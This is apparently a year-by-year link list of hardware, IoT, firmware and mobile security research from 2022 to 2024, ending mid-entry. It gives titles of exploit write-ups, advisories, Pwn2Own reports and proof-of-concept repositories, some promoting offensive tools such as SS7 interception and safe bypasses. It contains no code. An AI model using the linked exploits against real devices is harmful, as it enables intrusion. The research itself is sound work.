<content type="html"><![CDATA[<h2 id="2024"><a href="#2024" class="headerlink" title="2024"></a>2024</h2><ul><li><a href="https://voidstarsec.com/blog/jtag-pifex">JTAG Hacking with a Raspberry Pi - Introducing the PiFex</a></li><li><a href="https://blog.oversecured.com/20-Security-Issues-Found-in-Xiaomi-Devices/#settings---binding-arbitrary-services-with-system-privileges">20 Security Issues Found in Xiaomi Devices</a></li><li><a href="https://blog.lleavesg.top/article/Android-DirtyStream">Android-DirtyStream 漏洞详细说明</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/05/01/dirty-stream-attack-discovering-and-mitigating-a-common-vulnerability-pattern-in-android-apps/?utm_source=pocket_reader">“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps</a> </li><li><a href="https://boschko.ca/tp-link-tddp-bof/">TP-Link TDDP Buffer Overflow Vulnerability</a></li><li><a href="https://github.com/TheOfficialFloW/PPPwn">TheOfficialFloW/PPPwn: PPPwn - PlayStation 4 PPPoE RCE</a></li><li><a href="https://www.synacktiv.com/publications/arlo-im-watching-you">Arlo: I’m watching you</a></li><li><a href="https://github.blog/2024-03-18-gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/">Gaining kernel code execution on an MTE-enabled Pixel 8</a></li><li><a href="https://bishopfox.com/blog/breaking-fortinet-firmware-encryption">Breaking Fortinet Firmware Encryption</a></li><li><a href="https://labs.ioactive.com/2024/02/exploring-amd-platform-secure-boot.html"> Exploring AMD Platform Secure Boot</a></li><li><a href="https://bbs.kanxue.com/thread-260399.htm">浅析安全启动(Secure Boot)</a></li><li><a href="https://dfir.ru/2024/01/15/cve-2023-4001-a-vulnerability-in-the-downstream-grub-boot-manager/">CVE-2023-4001: a vulnerability in the (downstream) GRUB boot manager</a></li><li><a href="https://blog.quarkslab.com/pixiefail-nine-vulnerabilities-in-tianocores-edk-ii-ipv6-network-stack.html?utm_source=pocket_reader">PixieFail: Nine vulnerabilities in Tianocore’s EDK II IPv6 network stack</a></li></ul><h2 id="2023"><a href="#2023" class="headerlink" title="2023"></a>2023</h2><ul><li><a href="https://github.com/asset-group/5ghoul-5g-nr-attacks">5Ghoul - 5G NR Attacks & 5G OTA Fuzzing</a></li><li><a href="https://francozappa.github.io/post/2023/bluffs-ccs23/">BLUFFS: Bluetooth Forward and Future Secrecy Attacks and Defenses</a></li><li><a href="https://www.forescout.com/blog/sierra21-supply-chain-vulnerabilities-iot-ot-routers/">Forescout Vedere Labs discloses 21 new vulnerabilities affecting OT/IoT routers</a></li><li><a href="https://research.nccgroup.com/2023/08/11/syspwn-vr-for-pwn2own/">SysPWN – VR for Pwn2Own</a></li><li><a href="https://www.whid.ninja/blog/denial-of-pleasure-attacking-unusual-ble-targets-with-a-flipper-zero">Denial of Pleasure: Attacking Unusual BLE Targets with a Flipper Zero</a></li><li><a href="https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack.html">Understanding CVE-2020-7958: Biometric Data Extraction in Android</a></li><li><a href="https://www.cyberark.com/resources/all-blog-posts/nvme-new-vulnerabilities-made-easy">NVMe: New Vulnerabilities Made Easy</a></li><li><a href="https://mp.weixin.qq.com/s/jRa_IjOgxxyqPICcqVvUzA">【TrustZone相关漏洞导读】探索澎湃S1的安全视界</a></li><li><a href="https://o0xmuhe.github.io/2022/11/23/议题解读-MOSEC2022-MediAttack-break-the-boot-chain-of-MediaTek-SoC/">议题学习:MOSEC2022 MediAttack - break the boot chain of MediaTek SoC</a></li><li><a href="https://www.nitrokey.com/news/2023/smartphones-popular-qualcomm-chip-secretly-share-private-information-us-chip-maker?page=1">Smartphones With Popular Qualcomm Chip Secretly Share Private Information With US Chip-Maker</a></li><li><a href="https://www.redteam-pentesting.de/en/advisories/rt-sa-2023-006/-d-link-dap-x1860-remote-command-injection">RedTeam Pentesting GmbH - D-Link DAP-X1860: Remote Command Injection</a></li><li><a href="https://starlabs.sg/blog/2023/06-the-old-the-new-and-the-bypass-one-clickopen-redirect-to-own-samsung-s22-at-pwn2own-2022/">The Old, The New and The Bypass - One-click/Open-redirect to own Samsung S22 at Pwn2Own 2022</a></li><li><a href="https://margin.re/2022/06/pulling-mikrotik-into-the-limelight/">Pulling MikroTik into the Limelight</a></li><li><a href="https://www.tetraburst.com/">TETRA:BURST | Midnight Blue</a></li><li><a href="https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/">Rooting Xiaomi WiFi Routers</a></li><li><a href="https://boschko.ca/glinet-router/">Vulnerabilities and Hardware Teardown of GL.iNET MT300N-V2</a></li><li><a href="https://www.nozominetworks.com/blog/dji-mavic-3-drone-research-part-1-firmware-analysis/">DJI Mavic 3 Drone Firmware Analysis</a></li><li><a href="https://labs.ioactive.com/2023/06/applying-fault-injection-to-firmware.html?m=1&utm_source=pocket_saves">Applying Fault Injection to the Firmware Update Process of a Drone</a> <a href="https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf">Paper</a></li><li><a href="https://stigward.github.io/posts/fiio-m6-exploit/">Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug</a></li><li><a href="https://wzt.ac.cn/2023/05/12/spa112/">Cisco SPA112 固件解包/打包分析</a></li><li><a href="https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022">Pwn2Own Toronto 22: Exploit Netgear Nighthawk RAX30 Routers</a></li><li><a href="https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/">The Dragon Who Sold His Camaro: Analyzing Custom Router Implant</a></li><li><a href="https://drone-hacks.com/">Drone-Hacks, the best way to hack your DJI Drone</a></li><li><a href="https://kuenzi.dev/toothbrush/">Hacking my “smart” toothbrush</a></li><li><a href="https://twitter.com/atc1441/status/1662192314649833472">Teardown of the Disneyland entry band</a></li><li><a href="https://jcjc-dev.com/2023/03/19/reversing-domyos-el500-elliptical/">Practical Introduction to BLE GATT Reverse Engineering: Hacking the Domyos EL500 · Hack The World</a></li><li><a href="https://farlow.dev/2023/03/02/hacking-the-nintendo-dsi-browser">Hacking the Nintendo DSi Browser</a></li><li><a href="https://www.atomic14.com/2023/05/04/hue-light-hacking.html">Hue Light Hack</a></li><li><a href="https://www.greynoise.io/blog/debugging-d-link-emulating-firmware-and-hacking-hardware">Debugging D-Link: Emulating firmware and hacking hardware</a></li><li><a href="https://github.com/Mr-xn/BLACKHAT_Asia2023/blob/main/AS23-Xing-Dilemma-In-IoT-Access-Control.pdf">BLACKHAT_Asia2023/AS23-Xing-Dilemma-In-IoT-Access-Control</a></li><li><a href="https://blog.thalium.re/posts/fuzzing-samsung-system-services/">The Fuzzing Guide to the Galaxy: An Attempt with Android System Services</a></li><li><a href="https://www.synacktiv.com/publications/i-hack-u-boot.html">I hack, U-Boot</a></li><li><a href="https://robocoffee.de/?p=436">Hacking Brightway scooters: A case study</a></li><li><a href="https://github.com/Skiti/BreakMi">BreakMi:a security assessment toolkit for BLE fitness trackers</a></li><li><a href="https://www.freebuf.com/articles/endpoint/363738.html">电信天翼网关3.0分析(上)</a></li><li><a href="https://binarly.io/posts/Multiple_Vulnerabilities_in_Qualcomm_and_Lenovo_ARM_based_Devices/index.html">Multiple Vulnerabilities in Qualcomm and Lenovo ARM-based Devices</a></li><li><a href="https://www.ss7.dev/">SS7 Hack Software - How to hack SS7 and Intercept SMS</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/drone-security-and-the-mysterious-case-of-djis-droneid/">Drone Security and the Mysterious Case of DJI’s DroneID - NDSS Symposium</a></li><li><a href="https://googleprojectzero.blogspot.com/2023/03/multiple-internet-to-baseband-remote-rce.html">Project Zero: Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems</a></li><li><a href="https://research.aurainfosec.io/pentest/threat-on-your-desk-evil-usbc-dock/">The Threat on Your Desk: Building an Evil USB-C Dock · Aura Research Division</a></li><li><a href="https://www.tecsecurity.io/blog/tp-link_ax1800">PWNING THE TP-LINK AX1800 WIFI 6 ROUTER: UNCOVERED AND EXPLOITED A MEMORY CORRUPTION VULNERABILITY</a></li><li><a href="https://labs.taszk.io/articles/post/reunzip/">REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB - taszk.io labs</a></li><li><a href="https://binarly.io/posts/Multiple_Vulnerabilities_in_Qualcomm_and_Lenovo_ARM_based_Devices/index.html">Multiple Vulnerabilities in Qualcomm and Lenovo ARM-based Devices</a></li><li><a href="https://hackmd.io/@pepsipu/ry-SK44pt?s=09">Nightmare: One Byte to ROP // Deep Dive Edition</a></li><li><a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html?m=1">Exploiting CVE-2022-42703 - Bringing back the stack attack</a></li><li><a href="https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/">CVE-2022-21819 | PCIe DMA Attack against a secured Jetson Nano</a></li><li><a href="https://www.flashback.sh/blog/weekend-destroyer-wd-pr4100-rce">WEEKEND DESTROYER - RCE in Western Digital PR4100 NAS</a></li><li><a href="https://mccaulay.co.uk/mast1c0re-introduction-exploiting-the-ps4-and-ps5-through-a-gamesave/">mast1c0re: Introduction – Exploiting the PS4 and PS5 through a game save – McCaulay</a></li><li><a href="https://blog.the.al/2023/01/01/ds4-reverse-engineering.html">DualShock4 Reverse Engineering</a></li><li><a href="https://github.com/PabloMK7/ENLBufferPwn">PabloMK7/ENLBufferPwn: Information and PoC about the ENLBufferPwn vulnerability</a></li><li><a href="https://blog.dixitaditya.com/manipulating-aes-traffic-using-a-chain-of-proxies-and-hardcoded-keys">Manipulating AES Traffic using a Chain of Proxies and Hardcoded Keys</a></li><li><a href="https://cq674350529.github.io/2023/02/10/Analyzing-an-Old-Netatalk-dsi-writeinit-Buffer-Overflow-Vulnerability-in-NETGEAR-Router/">Analyzing an Old Netatalk dsi_writeinit Buffer Overflow Vulnerability in NETGEAR Router</a></li><li><a href="https://github.com/b1ack0wl/vulnerability-write-ups/blob/master/TP-Link/WR940N/112022/Part1.md">When an N-Day turns into a 0day. (Part 1 of 2)</a></li><li><a href="https://github.com/scarvell/advisories/blob/main/2022_netcomm_nf20mesh_unauth_rce.md">Netcomm - Unauthenticated Remote Code Execution</a></li><li><a href="https://github.com/MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass">Xiaomi-HyperOS-BootLoader-Bypass</a></li><li><a href="https://blog.ornx.net/post/bluetooth-volume-fix/">Fixing the Volume on my Bluetooth Earbuds</a></li><li><a href="https://labs.taszk.io/articles/post/full_chain_bb_part1/">Full Chain Baseband Exploits</a></li><li><a href="https://haxx.in/posts/hacking-canon-imageclass/">Hacking the Canon imageCLASS MF742Cdw/MF743Cdw (again)</a></li><li><a href="https://github.com/actuator/com.tcl.browser/blob/main/CWE-94.md">A Remote Code Execution (RCE) vulnerability has been discovered in the com.tcl.browser application</a></li><li><a href="https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997">Building an Exploit for FortiGate Vulnerability CVE-2023-27997</a></li><li><a href="https://jfrog.com/blog/xorg-libx11-vulns-cve-2023-43786-cve-2023-43787-part-one/">CVE-2023-43786 & CVE-2023-43787 Vulns in libX11: All You Need To Know</a></li><li><a href="https://blog.quarkslab.com/our-pwn2own-journey-against-time-and-randomness-part-1.html">A journey into the Pwn2Own contest. Part 1: Netgear RAX30 router WAN vulnerabilities</a></li><li><a href="https://blog.quarkslab.com/starlink.html">Diving into Starlink’s User Terminal Firmware</a> </li><li><a href="https://research.nccgroup.com/2023/12/04/shooting-yourself-in-the-flags-jailbreaking-the-sonos-era-100">research.nccgroup.com/2023/12/04/shooting-yourself-in-the-flags-jailbreaking-the-sonos-era-100/</a></li><li><a href="https://eprint.iacr.org/2023/090.pdf">Unlimited Results: Breaking Firmware Encryption of ESP32-V3</a></li></ul><h2 id="2022"><a href="#2022" class="headerlink" title="2022"></a>2022</h2><ul><li><a href="https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html">Attacking Titan M with Only One Byte</a></li><li><a href="https://github.com/H4ckd4ddy/bypass-sentry-safe">bypass-sentry-safe</a></li><li><a href="https://github.com/infobyte/cve-2022-27255">CVE-2022-27255 - Realtek eCos SDK SIP ALG buffer overflow</a></li><li><a href="https://bwlryq.net/posts/vlan_hopping/">Networking - VLAN Hopping</a></li><li><a href="https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow/">MeshyJSON: A TP-Link tdpServer JSON Stack Overflow</a></li><li><a href="https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/">The Last Breath of Our Netgear RAX30 Bugs - A Tragic Tale before Pwn2Own Toronto 2022</a></li><li><a href="https://www.synacktiv.com/publications/cool-vulns-dont-live-long-netgear-and-pwn2own.html">Cool vulns don’t live long - Netgear and Pwn2Own</a></li><li><a href="https://www.g3gg0.de/wordpress/fpv/fpv-analysis-of-tbs-crossfire/">Analysis of TBS Crossfire, reverse engineering the air link</a></li><li><a href="https://voidstarsec.com/blog/uart-uboot-and-usb">Intro to Embedded RE: UART Discovery and Firmware Extraction via UBoot</a></li><li><a href="https://security.humanativaspa.it/a-journey-into-iot-unknown-chinese-alarm-part-4-internal-communications/">A journey into IoT - Unknown Chinese alarm - Part 4 - Internal communications </a></li><li><a href="https://cyberintel.es/publications/2022-12-07_BlackHat_Europe_pub/">Vlind Glitch: A Blind VCC Glitching Technique to Bypass the Secure Boot of the Qualcomm MSM8916 Mobile SoC</a></li><li><a href="https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/">Zyxel authentication bypass patch analysis (CVE-2022-0342)</a></li><li><a href="https://blog.impalabs.com/2212_huawei-security-hypervisor.html">Shedding Light on Huawei’s Security Hypervisor</a></li><li><a href="https://blog.impalabs.com/2212_advisory_huawei-security-hypervisor.html">Huawei Security Hypervisor Vulnerability </a></li><li><a href="https://github.com/scarvell/advisories/blob/main/2022_netcomm_nf20mesh_unauth_rce.md">Netcomm - Unauthenticated Remote Code Execution </a></li><li><a href="https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection/">Puckungfu: A NETGEAR WAN Command Injection</a></li><li><a href="https://blog.impalabs.com/2103_reversing-samsung-npu.html">Reversing and Exploiting Samsung’s NPU</a> <a href="https://blog.impalabs.com/2110_exploiting-samsung-npu.html">PART2</a></li><li><a href="https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/">The Android kernel mitigations obstacle race</a></li><li><a href="https://www.pentestpartners.com/security-blog/moto-e20-readback-vulnerability/">Moto E20 Readback Vulnerability</a></li><li><a href="https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/">Accidental $70k Google Pixel Lock Screen Bypass</a></li><li><a href="https://vulncheck.com/blog/xiongmai-iot-exploitation">Xiongmai IoT Exploitation</a></li><li><a href="https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce">TP-Link Tapo c200 Unauthenticated RCE</a></li><li><a href="http://www.hydrogen18.com/blog//hacking-zyxel-ip-cameras-pt-1.html">Hacking Zyxel IP cameras to gain a root shell</a></li><li><a href="https://www.anquanke.com/post/id/283630#h3-16">Tenda Ax12 设备分析</a></li><li><a href="https://arxiv.org/pdf/1910.03895.pdf">BrokenStrokes: On the (in)Security of Wireless Keyboards</a></li><li><a href="https://research.nccgroup.com/2022/11/17/cve-2022-45163/">NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)</a></li><li><a href="https://cybervelia.com/?p=1380">Hacking Smartwatches for Spear Phishing</a></li><li><a href="https://nns.ee/blog/2021/04/03/modem-rce.html">Code execution as root via AT commands on the Quectel EG25-G modem</a></li><li><a href="https://exfiles.eu/wp-content/uploads/2022/07/EXFILES-D5.1-Vulnerabilities-analysis-and-attack-scenarios-description-PU-M06.pdf">Extract Forensic Information for LEAs from Encrypted SmartPhones</a></li><li><a href="https://www.immunit.ch/blog/2022/10/26/ethernet-ghosting-nac-bypass/">immunIT – Ethernet ghosting & NAC bypass</a></li><li><a href="https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-UWB-Real-Time-Locating-Systems.pdf">Nozomi-Networks-WP-UWB-Real-Time-Locating-Systems</a> <a href="https://github.com/NozomiNetworks/blackhat22-uwb-rtls">uwb-rtls</a></li><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://rambo.codes/posts/2022-10-25-sirispy-ios-bug-allowed-apps-to-eavesdrop">SiriSpy - iOS bug allowed apps to eavesdrop on your conversations with Siri </a></li><li><a href="https://hackerone.com/reports/1340942">size_t-to-int vulnerability in exFAT leads to memory corruption via malformed USB flash drives</a></li><li><a href="https://margin.re/blog/pulling-mikrotik-into-the-limelight.aspx">Pulling MikroTik into the Limelight</a></li><li><a href="https://eshard.com/posts/pixel6_bootloader">Pixel6: Booting up (part 1)</a></li><li><a href="https://eshard.com/posts/pixel6bootloader-2">Pixel 6 bootloader: Emulation, ROP(part 2)</a></li><li><a href="https://eshard.com/posts/pixel6_bootloader_3">Pixel 6 Bootloader: Exploitation (part 3)</a></li><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/">FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)</a></li><li><a href="https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/">Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities</a></li><li><a href="https://github.com/infobyte/cve-2022-27255">CVE-2022-27255 - Realtek eCos SDK SIP ALG buffer overflow</a></li><li><a href="https://github.com/mich01/SpiderSMS">SpiderSMS: An End to End Encrypted SMS and SMS Tunneling app</a></li><li><a href="https://samy.link/blog/contec-flexlan-fxa2000-and-fxa3000-series-vulnerability-repo">Contec FLEXLAN FXA2000 and FXA3000 series vulnerability report which provide WiFi on airplanes</a></li><li><a href="https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/">Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities</a></li><li><a href="https://maxwelldulin.com/BlogPost?post=8579892224">When Athletic Abilities Just Aren’t Enough - Scoreboard Hacking Part 1</a></li><li><a href="https://nns.ee/blog/2022/08/05/routeros-container-rce.html">Symlinks as mount portals: Abusing container mount points on MikroTik’s RouterOS to gain code execution</a></li><li><a href="https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-ezviz-smart-cams">Vulnerabilities Identified in EZVIZ Smart Cams</a> <a href="https://www.bitdefender.com/files/News/CaseStudies/study/423/Bitdefender-PR-Whitepaper-EZVIZ-creat6311-en-EN.pdf">whitepaper</a></li><li><a href="https://fresh-eggs.github.io/xband_post.html">Exploring the XBAND Video Game Modem and Executing Arbitrary Code Over a Phone Line in 2022</a></li><li><a href="https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone">Attacking the Android kernel using the Qualcomm TrustZone</a></li><li><a href="https://www.nozominetworks.com/blog/vulnerability-in-dahua-s-onvif-implementation-threatens-ip-camera-security/">Vulnerability in Dahua’s ONVIF Implementation Threatens IP Camera Security</a></li><li><a href="https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/">QNAP Poisoned XML Command Injection (Silently Patched) </a></li><li><a href="https://mp.weixin.qq.com/s/6vLHD90P7x86O4QfyPfobA">对某款智能手环的分析与攻击</a></li><li><a href="https://github.com/KULeuven-COSIC/Starlink-FI">Starlink User Terminal Modchip</a></li><li><a href="https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/">Vulnerability within the UNISOC baseband opens mobile phones communications to remote hacker attacks</a></li><li><a href="https://blog.viettelcybersecurity.com/cve-2022-1040-sophos-xg-firewall-authentication-bypass/">CVE-2022-1040 Sophos XG Firewall Authentication bypass (viettelcybersecurity.com)</a></li><li><a href="https://blog.esp0x31.io/zathura-selinux-confined/">SELinux confined</a></li><li><a href="https://raelize.com/blog/qualcomm-ipq40xx-analysis-of-critical-qsee-vulnerabilities/">Qualcomm IPQ40xx: Analysis of Critical QSEE Vulnerabilities</a></li><li><a href="https://github.com/MarginResearch/FOISted">FOISted: MikroTik remote jailbreak for v6.x.x </a></li><li><a href="https://i.blackhat.com/asia-21/Thursday-Handouts/as-21-Johnson-Unprotected-Broadcasts-In-Android-9-and-10-wp.pdf">(Un)protected Broadcasts in Android 9 and 10</a></li><li><a href="https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack">CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack</a></li><li><a href="https://muffsec.com/blog/ics-pwn2own-2022/">randy: A pre-authenticated RCE exploit for Inductive Automation Ignition(Bypass,RCE)</a> <a href="https://github.com/sourceincite/randy">Source</a></li><li><a href="https://onekey.com/blog/advisory-festo-cecc-x-m1-command-injection-vulnerabilities/">FESTO: CECC-X-M1 - Command Injection Vulnerabilities</a></li><li><a href="https://www.pnfsoftware.com/blog/reversing-simatic-s7-plc-programs/">Reversing Simatic S7 PLC Programs</a></li><li><a href="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html">CVE-2020-27861 nday exploit: netgear orbi unauthenticated command injection</a></li><li><a href="https://comsec.ethz.ch/research/microarch/retbleed/">Retbleed: Arbitrary Speculative Code Execution with Return Instructions</a></li><li><a href="https://www.sstic.org/2022/presentation/intel_wifi/">Ghost in the Wireless, iwlwifi edition</a></li><li><a href="https://www.secura.com/blog/tpm-sniffing-attacks-against-non-bitlocker-targets">TPM Sniffing Attacks Against Non-Bitlocker Targets</a></li><li><a href="https://github.com/H4ckd4ddy/bypass-sentry-safe">A vulnerability allows opening electronic safes from the Sentry Safe and Master Lock company without any pin code.</a></li><li><a href="https://security.humanativaspa.it/multiple-vulnerabilities-in-zyxel-zysh/">Multiple vulnerabilities in Zyxel zysh</a></li><li><a href="https://garyodernichts.blogspot.com/2022/06/exploiting-wii-us-usb-descriptor-parsing.html?m=1">Gary’s hacking stuff: Exploiting the Wii U’s USB Descriptor parsing </a></li><li><a href="https://margin.re/blog/pulling-mikrotik-into-the-limelight.aspx">Pulling MikroTik into the Limelight</a></li><li><a href="https://blog.xilokar.info/firmware-key-extraction-by-gaining-el3.html">Firmware key extraction by gaining EL3</a></li><li><a href="https://labs.ioactive.com/2022/04/satellite-insecurity-vulnerability.html">Satellite (In)security: Vulnerability Analysis of Wideye SATCOM Terminals</a></li><li><a href="https://mp.weixin.qq.com/s/4MCmx4zrNL-nd6J3Y1Bp3g">Black Hat Asia 2022议题解读:Unix Domain Socket:安卓生态系统中通往权限提升的暗门</a></li><li><a href="https://research.nccgroup.com/2022/05/31/hardware-security-by-design-esp32-guidance/">Hardware Security By Design: ESP32 Guidance</a></li><li><a href="https://www.synacktiv.com/en/publications/the-printer-goes-brrrrr.html">The printer goes brrrrr!!! (堆溢出)</a></li><li><a href="https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-dns-bug-in-popular-c-standard-library-putting-iot-at-risk/?utm_source=pocket_mylist">Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk</a></li><li><a href="https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/">Microsoft finds new elevation of privilege Linux vulnerability(D-BUS)</a></li><li><a href="https://www.contextis.com/en/blog/hacking-canon-pixma-printers-doomed-encryption">Hacking Canon Pixma Printers - Doomed Encryption</a></li><li><a href="https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom">Another vulnerability in the LPC55S69 ROM</a></li><li><a href="https://oxide.computer/blog/lpc55">Exploiting Undocumented Hardware Blocks in the LPC55S69</a></li><li><a href="https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/">CVE-2022-23121: Remote Code Execution on Western Digital PR4100 NAS</a></li><li><a href="https://olegkutkov.me/2021/12/25/analysis-and-reverse-engineering-of-the-original-starlink-router/">Analysis and reverse-engineering of the original Starlink router</a></li><li><a href="https://iothacking.notion.site/AcidRain-VIASAT-89233c7ee1cc4da2aa75f5157364c943">AcidRain酸雨|VIASAT商用卫星通信系统攻击事件分析</a></li><li><a href="https://blog.xilokar.info/pwning-the-bcm61650.html">Pwning the bcm61650</a></li><li><a href="https://mp.weixin.qq.com/s/98YDkBrg0XZe32NLNnn5JQ">TP-Link-WDR-7660 VxWorks 路由器安全研究之固件分析</a></li><li><a href="https://devco.re/blog/2022/03/28/your-NAS-is-not-your-NAS/">Your NAS is not your NAS !</a></li><li><a href="https://blog.relyze.com/2022/04/pwning-cisco-rv340-with-4-bug-chain.html">Advanced Software Analysis: Pwning a Cisco RV340 with a 4 bug chain exploit</a></li><li><a href="https://blog.relyze.com/2022/03/cve-2022-27643-netgear-r6700v3-upnpd.html">Advanced Software Analysis: CVE-2022-27643 - NETGEAR R6700v3 upnpd Buffer Overflow Remote Code Execution Vulnerability</a></li><li><a href="https://www.synacktiv.com/publications/pwn2own-austin-2021-defeating-the-netgear-r6700v3.html">Pwn2Own Austin 2021 : Defeating the Netgear R6700v3</a></li><li><a href="https://medium.com/tenable-techblog/a-backdoor-lockpick-d847a83f4496">A Backdoor Lockpick. Reversing and Subverting Phicomm’s…</a></li><li><a href="https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc">Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router </a></li><li><a href="https://binarly.io/posts/AMI_UsbRt_Repeatable_Failures_A_6_year_old_attack_vector_still_affecting_millions_of_enterprise_devices/index.html">Repeatable Failures:AMI UsbRt - Six years later, firmware attack vector still affect millions of enterprise devices</a></li><li><a href="https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.1/">Shielder - Reversing embedded device bootloader (U-Boot) - p.1</a></li><li><a href="https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.2/">Shielder - Reversing embedded device bootloader (U-Boot) - p.2</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-dgnd3700v2-preauth-root-access/">Longue vue : an exploit chain that can compromise over the internet NETGEAR DGND3700v2 devices.</a> <a href="https://github.com/0vercl0k/longue-vue">Github</a> </li><li><a href="https://security.humanativaspa.it/a-journey-into-iot-unknown-chinese-alarm-part-1-discover-components-and-ports/">A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity22/presentation/kotuliak">LTrack: Stealthy Tracking of Mobile Phones in LTE</a></li><li><a href="https://www.anquanke.com/post/id/267183">Real World CTF Trust or Not Wp</a></li><li><a href="https://www.armis.com/research/pwnedpiper">PwnedPiper:Nine vulnerabilities in critical infrastructure used by 80% of major hospitals in North America.</a></li><li><a href="https://labs.taszk.io/articles/post/huawei_kirin990_bootrom_patch/">Test Point Break: Analysis of Huawei’s OTA Fix For BootROM Vulnerabilities</a></li><li><a href="https://i.blackhat.com/USA21/Wednesday-Handouts/US-21-Komaromy-How-To-Tame-Your-Unicorn-wp.pdf">How To Tame Your Unicorn: Exploring And Exploiting Zero-Click Remote Interfaces of Huawei Smartphones</a></li><li><a href="https://labs.taszk.io/articles/post/mtk_baseband_csn1_exploitation/">Exploiting CSN.1 Bugs in MediaTek Basebands</a></li><li><a href="https://labs.taszk.io/articles/post/unbox_your_phone_1/">Unbox Your Phone —— reverse engineering and exploiting Samsung’s TrustZone</a></li><li><a href="https://www.armis.com/research/tlstorm/">TLStorm: Three critical vulnerabilities discovered in APC Smart-UPS devices can allow attackers to remotely manipulate the power of millions of enterprise devices.</a></li><li><a href="https://www.binarly.io/posts/Repeatable_Firmware_Security_Failures_16_High_Impact_Vulnerabilities_Discovered_in_HP_Devices/index.html">Repeatable Firmware Security Failures:16 High Impact Vulnerabilities Discovered in HP Devices</a></li><li><a href="https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/">CVE-2022-24990: TerraMaster TOS unauthenticated remote command execution via PHP Object Instantiation</a></li><li><a href="https://www.ava-attack.org/">Alexa vs Alexa(AvA)</a></li><li><a href="https://research.nccgroup.com/2022/02/28/brokenprint-a-netgear-stack-overflow/">BrokenPrint: A Netgear stack overflow</a></li><li><a href="https://github.com/parsdefense/CVE-2021-1965">CVE-2021-1965: WiFi Zero Click RCE Trigger PoC</a></li><li><a href="https://eprint.iacr.org/2022/208.pdf">Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Keymaster Design</a></li><li><a href="https://github.com/synacktiv/samsung-q60t-exploit">samsung-q60t-exploit: Exploit and firmware decryption script</a> <a href="https://www.synacktiv.com/sites/default/files/2021-11/GreHack2021_Rooting_Samsung_Q60T_Smart_TV.pdf">Slides</a> <a href="https://www.youtube.com/watch?v=c_7I1j8kjgI">Video</a></li><li><a href="https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md">flashback_connects (Cisco RV340 SSL VPN 